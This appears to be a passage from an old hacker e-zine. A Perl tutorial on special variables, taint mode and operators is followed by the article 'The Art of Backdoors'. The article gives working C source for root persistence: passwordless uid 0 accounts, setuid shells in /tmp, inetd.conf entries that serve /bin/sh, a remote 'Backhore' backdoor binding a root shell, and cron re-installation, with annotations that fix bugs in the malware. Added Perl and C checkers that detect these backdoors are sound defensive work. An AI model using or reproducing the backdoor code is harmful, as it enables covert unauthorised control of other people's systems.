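        alarm 0;                                        # cancel: input arrived in time
    };
    alarm 0;                                            # never leave an alarm pending
    if ($@) {
        return undef if $@ eq "timeout\n";
        die $@;                                         # anything else is a real error
    }
    return $line;
}

print "type a line within 5 seconds: ";
my $got = read_line_with_timeout(5);
if (defined $got) {
    print "got: $got";
} else {
    print "\nno input in time\n";
}
```

      The "local" on $SIG{ALRM} restores the previous handler when the eval
      block ends, so the timeout logic does not leak into the rest of the
      program.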
      
      @_ : Default pattern and search space
              
              This is the mother of all Perl special variables. If it's used in a
      subroutine, it holds the arguments passed to the sub. If used when reading
      from a file, it's set to the data being currently read. If functions that
      regularly require a value to execute have that value omitted, they will
      use the contents of @_. For example:
      
      <++> perl/mother.pl
      #! /usr/bin/perl
      
      $_ = "This is a test\n";
      print;  
      <--> end mother.pl
      
      OUTPUT: 
      
      Dark@darkness Dark >$ chmod +x mother.pl
      Dark@darkness Dark >$ ./mother.pl
      This is a test
      Dark@darkness Dark >$
      
      Just remember, when you aren't sure what data a function is working on,
      odds are that it is using @_.
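      An added example, not from the tutorial, to keep the two variables
      apart: $_ is the default scalar that print, chomp, foreach and a bare
      pattern match fall back on (mother.pl above is setting $_), while @_ is
      the argument list inside a subroutine. The data in it is made up:

```perl
#!/usr/bin/perl
# Added example, not part of the original tutorial. $_ is the default
# scalar that print, chomp, foreach and a bare pattern match fall back on;
# @_ is the argument list inside a subroutine. The data is made up.
use strict;
use warnings;

# Inside a sub the arguments arrive in @_. shift with no argument takes
# from @_ here (outside a sub it takes from @ARGV instead).
sub describe {
    my $name = shift;
    my @rest = @_;
    return "$name got " . scalar(@rest) . " extra argument(s): @rest";
}

print describe("first", 1, 2, 3), "\n";
print describe("second"), "\n";

# foreach with no loop variable of its own puts each element in $_, and
# print with no argument prints $_ (as in mother.pl above).
my @lines = ("alpha\n", "beta\n", "gamma\n");
foreach (@lines) {
    print;
}

# The same holds for chomp and for a pattern match written without =~.
foreach (@lines) {
    chomp;                              # strips the newline from $_
    print "starts with a or b: $_\n" if /^[ab]/;
}

# Reading a file with while (<FH>) also sets $_ to each line. Here the
# script reads its own source (the name is in $0) and counts the lines
# that mention "@_".
open my $fh, "<", $0 or die "cannot open $0: $!\n";
my $count = 0;
while (<$fh>) {
    $count++ if /\@_/;
}
close $fh;
print "$count lines of this script mention \@_\n";
```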
      
      $< : Process UID
      
              Since we all are interested in suid programs (hehe), I decided to
      include this one at the last minute. $< returns the numeric uid of the
      process. Like any other variable, it can be set to other values. For
      example:
      
      $< = 0;
      
      This code frag is identical to doing setuid(0) in C.
      
      NOTE: Before you start making SUID root programs in Perl, let me warn you
      about something. Perl has a lot of security when it runs suid root, this
      security is called "taintedness". Later we will explore suid root programs
      and tainted variables, but until then, read: man perlsec.
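      What "taintedness" looks like in practice, as an added example that is
      not from the tutorial (is_tainted() is the test the perlsec manpage
      gives; the rest is written for this page). Run it as
      perl -T taint.pl <name>; it assumes a Unix system with an id command in
      /usr/bin:

```perl
#!/usr/bin/perl -T
# Added example, not from the original tutorial: what taint mode does.
# Run it as  perl -T taint.pl <name>  (or chmod +x and run it directly;
# -T must be on from the start). Every value that comes from outside the
# program (@ARGV, %ENV, file input, ...) is marked tainted, and Perl dies
# rather than pass it to system(), exec(), backticks or an open() that
# writes. Assumes /usr/bin/id exists.
use strict;
use warnings;

# The is_tainted() test from perlsec: a string eval that contains any
# tainted data throws "Insecure dependency", which the block eval catches.
sub is_tainted {
    local $@;
    return ! eval { eval("#" . substr(join("", @_), 0, 0)); 1 };
}

# Under -T the environment is suspect too: drop the shell-influencing
# variables and set a fixed PATH before calling any external program.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
$ENV{PATH} = "/bin:/usr/bin";

print "real uid \$< = $<, effective uid \$> = $>\n";

my $arg = shift @ARGV;
defined $arg or die "usage: perl -T taint.pl <username>\n";
print "argument tainted? ", (is_tainted($arg) ? "yes" : "no"), "\n";

# The only way to untaint is a regex capture: the programmer states what
# shape the data may have, and only the captured part is trusted.
my ($user) = $arg =~ /\A([a-z_][a-z0-9_-]{0,31})\z/;
defined $user or die "refusing '$arg': not a plausible username\n";
print "captured value tainted? ", (is_tainted($user) ? "yes" : "no"), "\n";

# This runs. system("id", $arg) with the raw argument would instead die
# with "Insecure dependency in system while running with -T switch".
system("id", $user) == 0 or die "id failed: $?\n";
```

      The point of the capture is not the regex itself but that it forces
      the program to state which inputs are acceptable; a pattern like
      /(.*)/ "untaints" everything and defeats the check.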
      
      OK, that's all I'm going to cover (for now) on Perl variables. I know it's
      a long ass section, but you need to know this stuff so you can start
      fooling around with real Perl programs.
      
      -----------------------------------------------------------------------
      
      
      
      If you haven't taken a little break yet, DO IT NOW! Now we are gonna talk
      about Perl operators....
      
      
      
      -----------------------------------------------------------------------
      
      PERL OPERATORS:
      
      OK.. that mostly covers Perl data types.. now that we are all rested we
      will list many of the basic operators Perl offers.
      
      ++, -- Increment and Decrement. 
              USAGE: $scalar++; ++$scalar; $scalar--; --$scalar;
      
              Increases or decreases the value of $scalar. NOTE: If the operator
      appears before the variable name, the variable is changed before it is
      used. If the operator is after the variable, it is changed after the
      variable is used. This is only important if the increment or decrement is
      embedded in other Perl statements. When used alone, it really doesn't
      matter which convention you use.
      
      *, /, -, +, % Multiplication, Division, Subtraction, Addition and Modulo
              USAGE: $scalar = 4 * 25; $scalar = 100 % 13; etc etc..
      
              Performs the mathematical function depending on the symbol. I don't
      really think I need to show many examples of this.... most of you can add
      anyway ;)
              Modulo might be a bit unknown. It returns the remainder of the
      division of the two operands. For example: 5 % 2 returns 1, because 5
      divided by 2 is 2 remainder 1. It's most commonly used to print text after
      a set number of iterations of a loop. An example of this will be given
      when we cover conditionals and loops in the next volume.
      
      ** Exponentiation
              USAGE: $scalar = 5 ** 2; 
      
              Returns the value of the first operand to the power of the second.
      For example: $scalar = 2 ** 16; returns 65536, 2 to the power of 16.
      
      . Concatenation Operator
              USAGE: $scalar = "string1" . "string2"; $scalar = $var . $var2;
              This operator basically smushes both operands together into one
      string. For example: "one" . "two"; returns "onetwo". This is useful to
      combine the value of different scalars into one. Kinda like strcat() in C.
      
      ------------------------------------------------------------------
      NOTE: The above operators (except ++ and --) can be written in shorthand.
      For example: $var = $var + 20; is equivalent to $var += 20; $var %= 3; is
      equal to $var = $var % 3; $var++; is equal to $var += 1; $var =
      $var . "string"; is equal to $var .= "string"; If you don't notice the
      pattern yet, msg me on IRC or email me =)
      ------------------------------------------------------------------
      
      
      .. Sequence Operator
              USAGE: @array = ('a' .. 'z');
              This is one of my favorite operators, mainly because it turns a
      really long ass line of code into a simple statement. It returns a list of
      all values between the operands. For example:
      
      @array = ('a' .. 'z');
      print "@array\n";
      
      This snippet of code prints out: a b c d e f g h i j k l m n o p q r s t u
      v w x y z. All of the values between the operand "a" and the operand "z".
      This also works for numbers, floating point numbers, etc etc. I mostly use
      this in foreach loops, which we will cover next volume.  
      
      x Repetition operator
              USAGE: $scalar = "--" x 2;
              
              Repeats the STRING the number of times given by the integer. EX:
      "xy" x 3; returns "xyxyxy"
       
      
      &&, ||, ! Logical AND, OR, NOT
              These are usually used in conditionals, loops, or error checking.
      These will be discussed in more detail next volume.
      
      &, |, ^, <<, >> Bitwise AND, OR, XOR, Left shift, Right shift
              These operators work on the operands at the bit level. The
      only time I *EVER* use these is to decode the values returned by a stat()
      call, or for encryption schemes. I won't be covering these, but you can
      read your Perl documentation for more info (man perlop).
      
              OK, that somewhat covers most of the operators we will be using in our
      tutorials. I left some out, such as ?:, =~, !~, \, ->, and // because they
      will better fit when we discuss their corresponding topics. Play around
      with these operators, some can give you unexpected, but kewl results.. for
      example.. try using ++ and -- on a scalar that holds the string "aa" or
      something similar.
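      The operators above in one added script (not code from the tutorial),
      including the string increment the author suggests trying; all values
      in it are made up:

```perl
#!/usr/bin/perl
# Added example, not part of the original tutorial: the operators above
# used together, including the string-increment behaviour the text asks
# you to try. All values are made up for the demonstration.
use strict;
use warnings;

my $line = "-" x 40;                    # repetition: forty dashes
print "$line\n";

# Ranges work on numbers and on letters; both produce plain lists.
my @letters = ('a' .. 'e');
my @numbers = (1 .. 10);
print "@letters | @numbers\n";

# Modulo is the usual way to act every N iterations: here a separator
# after every 4th number.
my $row = "";
foreach my $n (@numbers) {
    $row .= $n . " ";                   # .= appends, like $row = $row . ...
    if ($n % 4 == 0) {
        $row .= "| ";
    }
}
print "$row\n";

# Exponentiation and the shorthand assignment forms.
my $bits = 16;
my $max  = 2 ** $bits;                  # 65536
$max    -= 1;                           # 65535, the largest 16-bit value
$bits   += 16;                          # now 32
print "largest $bits-bit value: ", 2 ** $bits - 1, " (16-bit was $max)\n";

# Magic increment: ++ on a string of letters counts through the alphabet
# and carries, like an odometer. -- has no such magic.
my $tag = "aa";
$tag++ for 1 .. 3;                      # aa -> ab -> ac -> ad
print "\"aa\" after three ++: $tag\n";
my $label = "Az";
$label++;                               # Az -> Ba
print "\"Az\"++ gives $label\n";
my $back = "aa";
{
    no warnings 'numeric';              # "aa" is treated as 0 here, and Perl would say so
    $back--;
}
print "\"aa\"-- gives $back\n";         # -1: the string was used as a number
```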
      
      ---------------------------------------------------------------------------
      
      Alright, that concludes this volume of the Perl tutorial.. I know it's
      quite long, but you won't see another one till mid August since I'm going on
      vacation (wooohooo). Today we covered:
      
              The 3 types of Perl variables
              How to set variables
              Variable context
              Array sizes
              keys(), exists(), defined(), and other functions that act on
      variables
              Special Perl variables
              Basic Perl operators
      
      Play around with some of the stuff we talked about and you should know
      enough to make simple Perl programs. For example try a line like this
      in your code: 
      
      $scalar = `/bin/date`;
      print "$scalar\n";
      
      (THOSE ARE SINGLE BACK QUOTES)
      
      Perl is a language where EVERYTHING can be done in more than one way, mess
      around with what you already know, and you might come up with something
      cool.
      
              Laterz, 
              Darkmo0n
      
      
      If ya have any suggestions, comments, or source code you want to
      contribute, drop me a note at perl@whereipretendtowork.com or talk to me
      on irc.
      
      NEXT VOLUME: Conditional statements and Loops. 
              
      
                                   The Art of Backdoors
                              =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
      
                                        By Meb
                              (Meb_@Piratededucation.com)
                            Http://TriadSecurity.sacone.com/
      
      
      This article is intended to teach you how to maintain root after you have
      gained it.  It is definitely from the hacker's perspective, but could also
      be viewed from the admin's perspective, on how to detect these backdoors
      and remove them.  This article is not comprehensive, because there are so
      many ways to leave backdoors I could not possibly cover them all, but I'm
      sure it should explain certain methods and techniques for you to use.
      
      You've been trying to get into this box for a couple weeks, you've got
      your hands on an account but the privs are terrible.  The box is well known
      around to be very secure, but now you know just how good the admin is.
      You've tried everything, imap, nis, suid exploits, bad permissions, race
      conditions, but nothing is working.  Finally you stumble onto something
      which the admin overlooked and are quickly sitting on a root shell.  But
      what now? How do you keep this accomplishment you've worked so long on?
      
      
      [Basics]
      
      -1.
      
      You can add a UID 0 account to the passwd file.  This is not recommended
      because when the admin views the file, it will be incredibly obvious that
      his box has been compromised, and you will probably lose your root
      position.  Here's a short C program I wrote which will add a UID 0 account to
      /etc/passwd.
      
      <++> backdoor/backdoor1.c
      #include 
      
      main()
      {
      FILE *fd;
      fd=fopen("/etc/passwd","a+");
      fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
      }
      <-->
      
      In a similar attempt you could enable an abandoned account and change its
      uid to 0 and change the * in the second field.  This method would obviously
      be less obtrusive than the first.
      
      
      Leave a suid shell in /tmp.  Once the file is run you will have root privs
      again. This is everyone's favorite, but many boxes run cronjobs every couple
      hours or when they reboot to clean out tmp, and many boxes don't allow
      suid files to be executed.  You can of course remove all these setbacks by
      editing /var/spool/cron/crontabs/root and /etc/fstab.  Here's a little
      program that makes a suid shell called out in /tmp.
      
      <++> backdoor/backdoor2.c
      #include 
      main()
      {
      system("cp /bin/sh /tmp/out");
      system("chown root.root /tmp/out");
      system("chmod 4755 /tmp/out");
      }
      <-->
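      From the admin's side, as an added example that is not part of the
      article: a check for both of the backdoors above, extra uid 0 or
      passwordless entries in the passwd file and setuid-root files in
      world-writable directories. The passwd text inside it is constructed;
      arguments on the command line point it at a real file and real
      directories:

```perl
#!/usr/bin/perl
# Added example, written from the admin's side; it is not part of the
# original article. It looks for the two "Basics" backdoors above: extra
# uid 0 (or passwordless) accounts in the passwd file, and setuid-root
# files sitting in world-writable directories such as /tmp. The passwd
# text below is constructed; pass a real passwd path and directories on
# the command line to check a live system.
use strict;
use warnings;
use File::Find;

# Constructed sample: a normal file plus the kind of line backdoor1.c appends.
my $sample_passwd = <<'END';
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hax0r::0:0::/root:/bin/sh
END

# Returns a list of warnings for the given passwd file contents.
sub audit_passwd {
    my ($text) = @_;
    my @findings;
    foreach my $line (split /\n/, $text) {
        next if $line eq "" or $line =~ /^[#+-]/;      # skip comments and NIS lines
        my ($name, $pw, $uid) = split /:/, $line;
        next unless defined $uid and $uid =~ /^\d+$/;
        push @findings, "uid 0 account that is not root: $name"
            if $uid == 0 and $name ne "root";
        push @findings, "empty password field: $name"
            if $pw eq "";
    }
    return @findings;
}

# Walks the given directories and returns setuid-root regular files found
# in directories that are world-writable.
sub find_suid_in_writable_dirs {
    my @dirs = @_;
    my @hits;
    find(sub {
        return if -l $_;                               # ignore symlinks
        return unless -f _;                            # regular files only
        my ($mode, $uid) = (stat(_))[2, 4];
        return unless $uid == 0 and ($mode & 04000);   # root-owned and setuid
        my $dir_mode = (stat("."))[2];                 # find() has chdir'ed here
        push @hits, $File::Find::name if $dir_mode & 0002;
    }, @dirs);
    return @hits;
}

my $passwd_text = $sample_passwd;
if (@ARGV) {
    open my $fh, "<", $ARGV[0] or die "cannot read $ARGV[0]: $!\n";
    local $/;
    $passwd_text = <$fh>;
    close $fh;
}
my @passwd_findings = audit_passwd($passwd_text);
print "passwd: $_\n" for @passwd_findings;
print "passwd: no extra uid 0 or passwordless accounts\n" unless @passwd_findings;

my @scan = @ARGV > 1 ? @ARGV[1 .. $#ARGV] : ("/tmp");
my @suid = find_suid_in_writable_dirs(@scan);
print "setuid root file in world-writable directory: $_\n" for @suid;
print "no setuid root files under @scan in world-writable directories\n" unless @suid;
```

      Run without arguments it reports the constructed hax0r line twice
      (uid 0 and empty password) and scans /tmp. The text's point about
      "changing the * in the second field" of an abandoned account is exactly
      what the empty-password check catches.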
      
      [Intermediate]
      
      
      The super-server configuration file is not the first place an admin will
      look, so obviously it is a good place to put a backdoor. But what makes these
      backdoors best is that they're remote, so you don't have to have a local
      account to regain root.  First, some background info: The Internet daemon
      (/etc/inetd) listens for connection requests on TCP and UDP ports and
      spawns the appropriate program (usually a server) when a connection request
      arrives. The format of the /etc/inetd.conf file is simple. Typical lines
      look like this:
      
      (1)     (2)     (3)     (4)     (5)     (6)             (7)
      ftp     stream  tcp     nowait  root    /usr/etc/ftpd   ftpd
      talk    dgram   udp     wait    root    /usr/etc/ntalkd ntalkd
      
      1: This is the daemon name of the service that appears in /etc/services.
      This tells inetd what to look for in /etc/services to determine which port
      it should associate the program name with.
      
      2: This will tell inetd what type of connection to use when the session is
      established. TCP uses streams, and UDP (the connectionless protocol) uses
      datagrams.
      
      3: Protocol field, TCP or UDP. 
      
      4: This will tell inetd what the importance of the daemon is. A 'wait'
      flag indicates that the server will process a connection and make all
      subsequent connections wait. 'Nowait' means the server will accept a
      connection, spawn a child process to handle the connection, and then go
      back to sleep, waiting for further connections. 
      
      5: Is the user the daemon is run as. 
      
      6: Program to run when a connection arrives.
      
      7: is the actual command (and optional arguments). If the program is
      trivial (usally requiring no user interaction) inetd may handle it
      internally. This is done with an 'internal' flag in fields (6) and (7).
      So, to install a handy backdoor, choose a service that is not used often,
      and replace the daemon that would normally handle it with something else.
      You could make it spawn a program that adds a UID 0 acc, or creates a suid
      shell.
      
      To take over a service like daytime and instead of telling you the time it
      would drop you to a suid root shell, try something like this.
      
      Change the line in /etc/inetd.conf that looks like this:
      daytime stream  tcp     nowait  root    internal
      
      And change it to: 
      daytime stream  tcp     nowait /bin/sh  sh -i.
      
      Now you've done this, so you decide to go test it out.  You try and it
      says "Unable to establish connection", what's wrong?  Well in order for
      these changes to take place you need to restart inetd, you could wait for
      the box to reboot, but who's patient? Just do a "killall -9 inetd" and it
      will automatically restart itself.
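      Also from the admin's side, an added example (not part of the article)
      that reads inetd.conf as the seven fields described above and flags what
      the daytime trick leaves behind: a shell as the server program, a
      program outside the system directories, a service defined twice for the
      same protocol, or a malformed line. The config text inside it is
      constructed; a path on the command line audits a real file:

```perl
#!/usr/bin/perl
# Added example, written from the admin's side; it is not part of the
# original article. It reads inetd.conf lines as the seven fields described
# above and flags what the daytime trick leaves behind: a shell as the
# server program, a program outside the system directories, a service
# defined twice for the same protocol, or a line with too few fields. The
# config text is constructed; pass a real path on the command line instead.
use strict;
use warnings;

my $sample_conf = <<'END';
# ordinary entries
ftp     stream  tcp     nowait  root    /usr/etc/ftpd   ftpd
talk    dgram   udp     wait    root    /usr/etc/ntalkd ntalkd
daytime stream  tcp     nowait  root    internal
# a second daytime line handing the connection to a shell, and a made-up
# service whose program lives in /tmp
daytime stream  tcp     nowait  root    /bin/sh         sh -i
backdoor stream tcp     nowait  root    /tmp/.x         .x
END

# Directories a server program is normally started from.
my $system_dirs = qr{^/(?:usr/(?:local/)?(?:s?bin|etc|libexec)|etc|s?bin)/};

# Returns a list of "line N: reason" strings for the given file contents.
sub audit_inetd_conf {
    my ($text) = @_;
    my (@findings, %seen);
    my $n = 0;
    foreach my $line (split /\n/, $text) {
        $n++;
        next if $line =~ /^\s*(?:#|$)/;                # comments and blank lines
        my ($service, $type, $proto, $wait, $user, $program, @args)
            = split ' ', $line;
        if (!defined $program) {
            push @findings, "line $n: fewer than six fields: $line";
            next;
        }
        my $key = "$service/$proto";
        push @findings, "line $n: $key is already defined on line $seen{$key}"
            if exists $seen{$key};
        $seen{$key} = $n;
        next if $program eq "internal";                # handled inside inetd
        if ($program =~ m{(?:^|/)(?:ba|c|k|tc|z)?sh$}) {
            push @findings,
                "line $n: $service hands the connection to a shell ($program @args)";
        }
        elsif ($program !~ $system_dirs) {
            push @findings,
                "line $n: $service runs $program from outside the system directories";
        }
    }
    return @findings;
}

my $conf = $sample_conf;
if (@ARGV) {
    open my $fh, "<", $ARGV[0] or die "cannot read $ARGV[0]: $!\n";
    local $/;
    $conf = <$fh>;
    close $fh;
}
my @findings = audit_inetd_conf($conf);
if (@findings) {
    print "$_\n" for @findings;
} else {
    print "no suspicious inetd.conf entries\n";
}
```

      Because the check keys on field 6, it also catches the variant where
      the user field has been dropped and /bin/sh slides into its place: the
      fields shift, but "sh" still ends up where the program name is parsed.
      Comparing the file against a known-good copy, and restarting inetd only
      from a reviewed configuration, is the complementary control.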
      
      Another thing you could do is make a fake service and make it spawn a
      program which would be more secure, such as password protected, and have
      better options, so that you would have the power to modify the system
      further remotely without the difficulties of not running off of telnetd.
      Here is a program that will bind to any port and wait, it will not give a
      prompt, simply put in the password and you will be given a menu of
      options.  This code was written by theft shortly before he left the scene
      so it might have a few bugs in it as well as some non-working functions.
      
      <++> backdoor/remoteback.c
      /* Coders:
              Theft
      
      Help from:
              Sector9, Halogen
      
      Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, 
                      Psionic, g0d, Psionic.
              Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
                      Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
                      Tg0d, EHAP.
      Usage:
              Setup:          
                      # gcc -o backhore backhore.c    # ./backdoor password & 
              Run:            
                      Telnet to the host on port 4000.  After connected you
                      Will not be prompted for a password, this way it is less
                      Obvious, just type the password and press enter, after this
                      You will be prompted for a command, pick 1-8.
      
      Distributers:
              Ethical Mutiny Crew
      
      */
      
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      
      
      #define PORT 4000
      #define MAXDATASIZE 100
      #define BACKLOG 10
      #define SA struct sockaddr  /* leaner meaner code */
      
      void handle(int);
      
      int
      main(int argc, char *argv[])
      {
              int sockfd, new_fd, sin_size, numbytes, cmd;
              char ask[10]="Command: ";
              char *bytes, *buf, pass[40];
              struct sockaddr_in my_addr;
      
              struct sockaddr_in their_addr;
      
              printf("\n      Backhore BETA by Theft\n");
              printf(" 1: trojans rc.local\n");
              printf(" 2: sends a systemwide message\n");
              printf(" 3: binds a root shell on port 2000\n");
              printf(" 4: creates suid sh in /tmp\n");
              printf(" 5: creates mutiny account uid 0 no passwd\n");
              printf(" 6: drops to suid shell\n");
              printf(" 7: information on backhore\n");
              printf(" 8: contact\n");
      
              if (argc != 2) {
                      fprintf(stderr,"Usage: %s password\n", argv[0]);
                      exit(1);
              }
      
              strncpy(pass, argv[1], 40);
              printf("..using password: %s..\n", pass);
      
      
              if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                      perror("socket");
                      exit(1);
              }
      
              my_addr.sin_family = AF_INET;
              my_addr.sin_port = htons(PORT);
              my_addr.sin_addr.s_addr = INADDR_ANY;
      
              if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
      
                      perror("bind");
                      exit(1);
              }
      
              if (listen(sockfd, BACKLOG) == -1) {
                      perror("listen");
                      exit(1);
              }
      
              sin_size = sizeof(SA);
              while(1) {  /* main accept() loop */
                      if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
                              perror("accept");
                              continue;
                      }
                      if (!fork()) {
                              dup2(new_fd, 0);
                              dup2(new_fd, 1);
                              dup2(new_fd, 2);
                              fgets(buf, 40, stdin);
                              if (!strcmp(buf, pass)) {
                                      printf("%s", ask);
                                      cmd = getchar();
                                      handle(cmd);
                              }
                              close(new_fd);
                              exit(0);
                      }
                      close(new_fd);
                      while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
              }
      }
      
      
      
      void
      handle(int cmd)
      {
              FILE *fd;
      
              switch(cmd) {
                      case '1':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("Trojaning rc.local\n");
                              fd = fopen("/etc/passwd", "a+");
                              fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh\n");
                              fclose(fd);
                              printf("Trojan complete.\n");
                              break;
                      case '2':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("Sending systemwide message..\n");
                              system("wall Box owned via the Ethical Mutiny Crew");
                              printf("Message sent.\n");
                              break;
                      case '3':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("\nAdding inetd backdoor... (-p)\n");
                              fd = fopen("/etc/services","a+");
                              fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
                              fclose(fd);
                              /* inetd.conf fields: service type proto wait user program args;
                               * the args begin with the program's own argv[0]. */
                              fd = fopen("/etc/inetd.conf","a+");
                              fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh\tsh -i\n");
                              fclose(fd);
                              /* execl() would replace this process (and needs a full path),
                               * so "done." would never print; reload inetd via the shell. */
                              system("killall -HUP inetd");
                              printf("\ndone.\n");
                              printf("telnet to port 2000\n\n");
                              break;
                      case '4':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("\nAdding Suid Shell... (-s)\n");
                              system("cp /bin/sh /tmp/.sh");
                              system("chown root:root /tmp/.sh");
                              system("chmod 4700 /tmp/.sh");   /* chown clears the setuid bit, so set it last */
                              printf("\nSuid shell added.\n");
                              printf("execute /tmp/.sh\n\n");
                              break;
                      case '5':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("\nAdding root account... (-u)\n");
                              fd=fopen("/etc/passwd","a+");
                              fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
                              fclose(fd);
                              printf("\ndone.\n");
                              printf("uid 0 and gid 0 account added\n\n");
                              break;
                      case '6':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("Executing suid shell..\n");
                              /* execl() wants the path, argv[0] and a terminating null pointer */
                              execl("/tmp/.sh", "sh", (char *)0);
                              perror("execl");
                              break;
                      case '7':
                              printf("\nBackhore BETA by Theft\n");
                              printf("theft@cyberspace.org\n");
                              printf("\nInfo... (-i)\n");
                              printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
                              printf("a root shell on port 2000. example: telnet <host> 2000\n\n");
                              printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
                              printf("executed gives you a root shell. example:/tmp/.sh\n\n");
                              printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
                              printf("The login is 'hax0r' and there is no passwd.\n");
                              break;
                      case '8':
                              printf("\nBackhore BETA by Theft\n");
                              printf("\nhttp://theft.bored.org\n");
                              printf("theft@cyberspace.org\n\n");
                              break;
                      default:
                              printf("unknown command: %d\n", cmd);
                              break;
              }
      }
      <-->
      
      [Advanced]
      
      
       Cron is a very powerful tool for the admin.  It is used to schedule jobs
       to run at certain times of the day, month, or year.  Can you see where
       this is going?  Because of this, you can make a very powerful backdoor.
       With cron you could make it spawn a program at, say, 3:00 am, when the
       admin is asleep, so you can quickly get in, do as you like and get out
       before he ever notices; the possibilities are endless.  The root crontab
       is a plain file in the cron spool directory, /var/spool/crontab/root on
       the system described here (on most Linux distributions it is
       /var/spool/cron/root or /var/spool/cron/crontabs/root), and it can be
       edited by hand, although "crontab -e" is the reliable way since cron
       only re-reads the spool when it sees the directory's modification time
       change.  The cron lines will look something like this.
      
       (1)     (2)     (3)     (4)     (5)     (6)
        0       0       *       *       3       /usr/bin/updatedb      
       
       1. Minute        (0-59)
       2. Hour          (0-23)
       3. Day of month  (1-31) 
       4. Month         (1-12)
       5. Day of week   (0-7; 0 and 7 are both Sunday, so 3 is Wednesday)
       6. The command (or shell script) to execute.  A * in any of the time
          fields means "every".
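       To reason about when an entry like the one above actually fires, here is
       a small matcher (added for this text; it is not part of the original
       article) that parses the five time fields of a crontab line, with support
       for *, single values, ranges, comma lists and */step, and reports whether
       they match a given minute, hour, day, month and weekday.  It follows Vixie
       cron's rules: 0 and 7 both mean Sunday, and when both the day-of-month and
       day-of-week fields are restricted the job runs when either one matches.
       The function names are mine.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Match one crontab time field against value v (lo..hi is the legal range
 * of the field).  Supports "*", "n", "a-b", "x,y,z" and "x/step" where x is
 * "*" or a range.  Returns 1 or 0, or -1 if the field is malformed. */
static int cron_field_matches(const char *field, int v, int lo, int hi)
{
        char buf[128];
        char *tok;

        if (strlen(field) >= sizeof buf)
                return -1;
        strcpy(buf, field);

        for (tok = strtok(buf, ","); tok; tok = strtok(NULL, ",")) {
                int a = lo, b = hi, step = 1;
                char *slash = strchr(tok, '/');

                if (slash) {
                        *slash = '\0';
                        step = atoi(slash + 1);
                        if (step <= 0)
                                return -1;
                }
                if (strcmp(tok, "*") != 0) {
                        char *dash = strchr(tok, '-');
                        if (!isdigit((unsigned char)tok[0]))
                                return -1;
                        a = atoi(tok);
                        b = dash ? atoi(dash + 1) : (slash ? hi : a);
                        if (a < lo || b > hi || a > b)
                                return -1;
                }
                if (v >= a && v <= b && (v - a) % step == 0)
                        return 1;
        }
        return 0;
}

/* Would the crontab line fire at the given moment?  dow: 0 = Sunday ...
 * 6 = Saturday (7 is accepted as Sunday too, as in the spec).  Returns 1
 * (fires), 0 (does not), or -1 (malformed line). */
int cron_matches(const char *line, int min, int hour, int dom, int mon, int dow)
{
        const int lo[5] = { 0, 0, 1, 1, 0 };
        const int hi[5] = { 59, 23, 31, 12, 7 };
        char buf[512];
        char *f[5], *p;
        int val[5], m[5], i;

        if (strlen(line) >= sizeof buf)
                return -1;
        strcpy(buf, line);
        for (i = 0, p = strtok(buf, " \t\n"); i < 5 && p; i++, p = strtok(NULL, " \t\n"))
                f[i] = p;
        if (i < 5)
                return -1;                     /* fewer than five time fields */

        val[0] = min; val[1] = hour; val[2] = dom; val[3] = mon; val[4] = dow % 7;
        for (i = 0; i < 5; i++) {
                m[i] = cron_field_matches(f[i], val[i], lo[i], hi[i]);
                if (i == 4 && m[i] == 0 && val[4] == 0)   /* a field of "7" also means Sunday */
                        m[i] = cron_field_matches(f[i], 7, lo[i], hi[i]);
                if (m[i] < 0)
                        return -1;
        }
        if (!m[0] || !m[1] || !m[3])
                return 0;
        /* Vixie cron rule: if both day fields are restricted (neither starts
         * with '*'), the job runs when EITHER of them matches. */
        if (f[2][0] != '*' && f[4][0] != '*')
                return (m[2] || m[4]) ? 1 : 0;
        return (m[2] && m[4]) ? 1 : 0;
}

int main(void)
{
        const char *line = "0 0 * * 3 /usr/bin/updatedb";   /* the article's example line */
        printf("Wednesday 00:00 -> %d\n", cron_matches(line, 0, 0, 5, 4, 3));
        printf("Thursday  00:00 -> %d\n", cron_matches(line, 0, 0, 6, 4, 4));
        printf("Wednesday 00:01 -> %d\n", cron_matches(line, 1, 0, 5, 4, 3));
        return 0;
}
```

       Feed it the time an incident is believed to have happened and the lines of
       a suspect crontab, and it tells you which entries could have run then.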
      
       The example line runs /usr/bin/updatedb at midnight every Wednesday.  To
       create a backdoor in cron, just add your own line to the root crontab.
       You could have it run a shell script every night which checks whether
       the account we created earlier is still in /etc/passwd and puts it back
       if it is gone.  To start this, you would add this line (the script below
       would be installed as /usr/bin/retract):
       
       0       0       *       *       *       /usr/bin/retract
      
       <++> backdoor/backdoor.sh
       #!/bin/csh
       # Is our account still alive in /etc/passwd? We'll see.
       # Install as /usr/bin/retract, the name used in the crontab line above.
       
       set evilflag = (`grep '^Meb:' /etc/passwd`)    
